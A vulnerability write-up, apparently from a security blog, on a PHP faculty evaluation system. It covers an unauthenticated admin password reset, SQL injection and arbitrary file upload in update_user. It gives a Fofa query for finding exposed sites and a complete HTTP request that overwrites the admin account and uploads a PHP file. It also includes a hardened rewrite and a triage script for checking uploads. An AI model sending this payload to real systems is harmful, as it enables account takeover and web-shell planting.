0x00 Preface
Fofa: "assets/dist/css/jquery.datetimepicker.min.css"
Source download: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
This is a dashboard-style system, and after reading the code all I can say is that it is hard to put into words..... The interface looks like this:
0x01 Unauthenticated admin password reset + file upload vulnerability
Let's first look at ajax.php, which dispatches to the update_user method:
<?php
ob_start();
date_default_timezone_set("Asia/Manila");
$action = $_GET['action']; // action is taken from the GET query string
include 'admin_class.php'; // pulls in admin_class.php
$crud = new Action();
// other irrelevant code omitted......
...
if($action == 'update_user'){
    $save = $crud->update_user(); // called with no login check of any kind
    if($save)
        echo $save;
...
Following it into admin_class.php, look at update_user: it updates the administrator's record directly, uploads a file along the way, and authentication is as good as nonexistent...
function update_user(){
    extract($_POST); // every POST field becomes a local variable: $id, $email, $password, ...
    $data = "";
    $type = array("","users","faculty_list","student_list");
    // every POST key except id/cpass/table/password is concatenated straight into the SQL, unescaped
    foreach($_POST as $k => $v){
        if(!in_array($k, array('id','cpass','table','password')) && !is_numeric($k)){
            if(empty($data)){
                $data .= " $k='$v' ";
            }else{
                $data .= ", $k='$v' ";
            }
        }
    }
    // email uniqueness check; $email and $id come straight from the request
    $check = $this->db->query("SELECT * FROM {$type[$_SESSION['login_type']]} where email ='$email' ".(!empty($id) ? " and id != {$id} " : ''))->num_rows;
    if($check > 0){
        return 2;
        exit;
    }
    // the upload keeps the client-supplied filename, extension included
    if(isset($_FILES['img']) && $_FILES['img']['tmp_name'] != ''){
        $fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
        $move = move_uploaded_file($_FILES['img']['tmp_name'],'assets/uploads/'. $fname);
        $data .= ", avatar = '$fname' ";
    }
    if(!empty($password))
        $data .= " ,password=md5('$password') ";
    // the row id comes from POST, so any caller can pick which account to overwrite
    if(empty($id)){
        $save = $this->db->query("INSERT INTO {$type[$_SESSION['login_type']]} set $data");
    }else{
        echo "UPDATE {$type[$_SESSION['login_type']]} set $data where id = $id"; // leftover debug output, echoes the query
        $save = $this->db->query("UPDATE {$type[$_SESSION['login_type']]} set $data where id = $id");
    }
    if($save){
        foreach ($_POST as $key => $value) {
            if($key != 'password' && !is_numeric($key))
                $_SESSION['login_'.$key] = $value;
        }
        if(isset($_FILES['img']) && !empty($_FILES['img']['tmp_name']))
            $_SESSION['login_avatar'] = $fname;
        return 1;
    }
}
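As an added example that is not part of the original project's code, here is how update_user could be rewritten to close the issues above: the row id comes from the session rather than the request, only a fixed set of columns can be changed and only through prepared statements, a password change requires the current password, and an uploaded avatar must be a real image and is stored under a server-generated name. It assumes a mysqli connection, that the login code sets $_SESSION['login_id'] and $_SESSION['login_type'], and that the password column has been migrated from md5() to password_hash(); the function name update_user_hardened and its parameters are my own.

```php
<?php
// Added example: a hardened replacement for update_user(). Not code from the
// original project. Assumes: $db is the application's mysqli connection,
// $session is $_SESSION as populated by the login code (login_id, login_type),
// and the password column stores password_hash() values (migrated from md5).

function update_user_hardened(mysqli $db, array $post, array $files, array $session): int
{
    // 1. Authentication: no session, no update. The original never checked this.
    if (empty($session['login_id']) || empty($session['login_type'])) {
        return 0;
    }
    $type  = ['', 'users', 'faculty_list', 'student_list'];
    $table = $type[(int)$session['login_type']] ?? '';
    if ($table === '') {
        return 0;
    }
    // 2. Authorization: the row id comes from the session, never from POST,
    //    so a user can only change their own record.
    $id = (int)$session['login_id'];

    // 3. Column allowlist: the original turned every POST key into "key='value'".
    $set = $params = [];
    $types = '';
    foreach (['firstname', 'lastname', 'email'] as $col) {
        if (isset($post[$col])) {
            $set[]    = "`$col` = ?";
            $params[] = (string)$post[$col];
            $types   .= 's';
        }
    }

    // 4. Email uniqueness check, parameterised.
    if (isset($post['email'])) {
        $stmt = $db->prepare("SELECT COUNT(*) FROM `$table` WHERE email = ? AND id != ?");
        $stmt->bind_param('si', $post['email'], $id);
        $stmt->execute();
        $stmt->bind_result($count);
        $stmt->fetch();
        $stmt->close();
        if ($count > 0) {
            return 2; // same return code the original uses for "email taken"
        }
    }

    // 5. Password change only with the current password; stored with password_hash().
    if (!empty($post['password'])) {
        $stmt = $db->prepare("SELECT password FROM `$table` WHERE id = ?");
        $stmt->bind_param('i', $id);
        $stmt->execute();
        $stmt->bind_result($stored);
        $stmt->fetch();
        $stmt->close();
        if (empty($post['cpass']) || !password_verify($post['cpass'], (string)$stored)) {
            return 0;
        }
        $set[]    = '`password` = ?';
        $params[] = password_hash($post['password'], PASSWORD_DEFAULT);
        $types   .= 's';
    }

    // 6. Avatar upload: validate the content, not the client-supplied name,
    //    and store it under a random name with an extension we choose.
    if (isset($files['img']) && $files['img']['error'] === UPLOAD_ERR_OK) {
        $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
        $info = @getimagesize($files['img']['tmp_name']);
        if ($info === false || !isset($allowed[$info['mime']])) {
            return 0; // a file that starts with "<?php" is not an image, so it stops here
        }
        $avatar = bin2hex(random_bytes(16)) . '.' . $allowed[$info['mime']];
        if (!move_uploaded_file($files['img']['tmp_name'], __DIR__ . '/assets/uploads/' . $avatar)) {
            return 0;
        }
        $set[]    = '`avatar` = ?';
        $params[] = $avatar;
        $types   .= 's';
    }

    if ($set === []) {
        return 1; // nothing to change
    }
    // 7. One prepared UPDATE; the table name comes from the fixed array, never from input.
    $params[] = $id;
    $types   .= 'i';
    $stmt = $db->prepare("UPDATE `$table` SET " . implode(', ', $set) . ' WHERE id = ?');
    $stmt->bind_param($types, ...$params);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok ? 1 : 0;
}
```

Two things sit outside this function: ajax.php should call session_start() and refuse every action when $_SESSION['login_id'] is empty, rather than leaving the check to each method; and the web server should be configured not to execute scripts under assets/uploads at all, since a valid image can still carry PHP in its metadata and the directory is only meant to serve avatars.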
On success it returns 1. In between there is also a block that checks the email, but that is not much of an obstacle:
$check = $this->db->query("SELECT * FROM {$type[$_SESSION['login_type']]} where email ='$email' ".(!empty($id) ? " and id != {$id} " : ''))->num_rows;
Payload:
POST /eval/ajax.php?action=update_user HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://x.x.x.x/eval/index.php?page=report
Content-Length: 737
Content-Type: multipart/form-data; boundary=---------------------------166782539326470
Connection: close
-----------------------------166782539326470
Content-Disposition: form-data; name="id"
1
-----------------------------166782539326470
Content-Disposition: form-data; name="firstname"
Administrator
-----------------------------166782539326470
Content-Disposition: form-data; name="lastname"
a
-----------------------------166782539326470
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------166782539326470
Content-Disposition: form-data; name="password"
admin
-----------------------------166782539326470
Content-Disposition: form-data; name="img"; filename="php.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
-----------------------------166782539326470--
What if the upload path isn't shown? Just log into the backend and look, using [email protected]|admin, since the password has already been changed...
The file actually ends up at: /assets/uploads/<timestamp>_filename.php
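For anyone who operates this system and wants to check whether the upload directory has already been abused, the following triage script (an added example, not part of the original project) lists everything under assets/uploads that is not a plain image. The original code names files <timestamp>_<original name>, so the prefix is decoded back into the upload time (minute precision, in the Asia/Manila timezone ajax.php sets); the application root is passed on the command line, and the path assets/uploads is taken from the code above. The function names classify_upload and scan_uploads are my own.

```php
<?php
// Added example: triage helper for the upload directory of this system.
// Not code from the original project. Assumes the original naming scheme
// <unix timestamp>_<client filename> and the directory assets/uploads
// under the application root given as the first CLI argument.

date_default_timezone_set('Asia/Manila'); // same zone ajax.php uses, so prefixes decode correctly

const IMAGE_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif'];

// Decode the timestamp prefix and decide whether a file name deserves a look.
function classify_upload(string $name): array
{
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    $uploadedAt = null;
    if (preg_match('/^(\d{9,10})_/', $name, $m)) {
        $uploadedAt = date('Y-m-d H:i', (int)$m[1]);
    }
    // Anything that is not an image is suspicious, and so is a script
    // extension hidden before another one (e.g. name.php.jpg).
    $suspicious = !in_array($ext, IMAGE_EXTENSIONS, true)
        || preg_match('/\.(php\d?|phtml|phar)\b/i', $name) === 1;
    return ['name' => $name, 'uploaded_at' => $uploadedAt, 'ext' => $ext, 'suspicious' => $suspicious];
}

// Walk the directory and return one record per suspicious file.
function scan_uploads(string $dir): array
{
    $entries = scandir($dir);
    if ($entries === false) {
        return [];
    }
    $findings = [];
    foreach ($entries as $name) {
        $path = $dir . DIRECTORY_SEPARATOR . $name;
        if ($name === '.' || $name === '..' || !is_file($path)) {
            continue;
        }
        $c = classify_upload($name);
        if (!$c['suspicious']) {
            continue;
        }
        // The first bytes separate a real image from a script regardless of the name.
        $head = (string)file_get_contents($path, false, null, 0, 64);
        $c['size'] = filesize($path);
        $c['has_php_tag'] = strpos($head, '<?') !== false;
        $findings[] = $c;
    }
    return $findings;
}

if (PHP_SAPI === 'cli') {
    $root = $argv[1] ?? '.';
    foreach (scan_uploads($root . '/assets/uploads') as $f) {
        printf("%-48s uploaded=%s size=%d php_tag=%s\n",
            $f['name'], $f['uploaded_at'] ?? 'unknown', $f['size'], $f['has_php_tag'] ? 'yes' : 'no');
    }
}
```

Run it as `php triage.php /var/www/eval` (path assumed); the decoded upload time gives the minute to search for in the web server access log, where the matching request will be a POST to ajax.php?action=update_user.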
Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; the author and this public account bear no legal or joint liability. Please take note!!!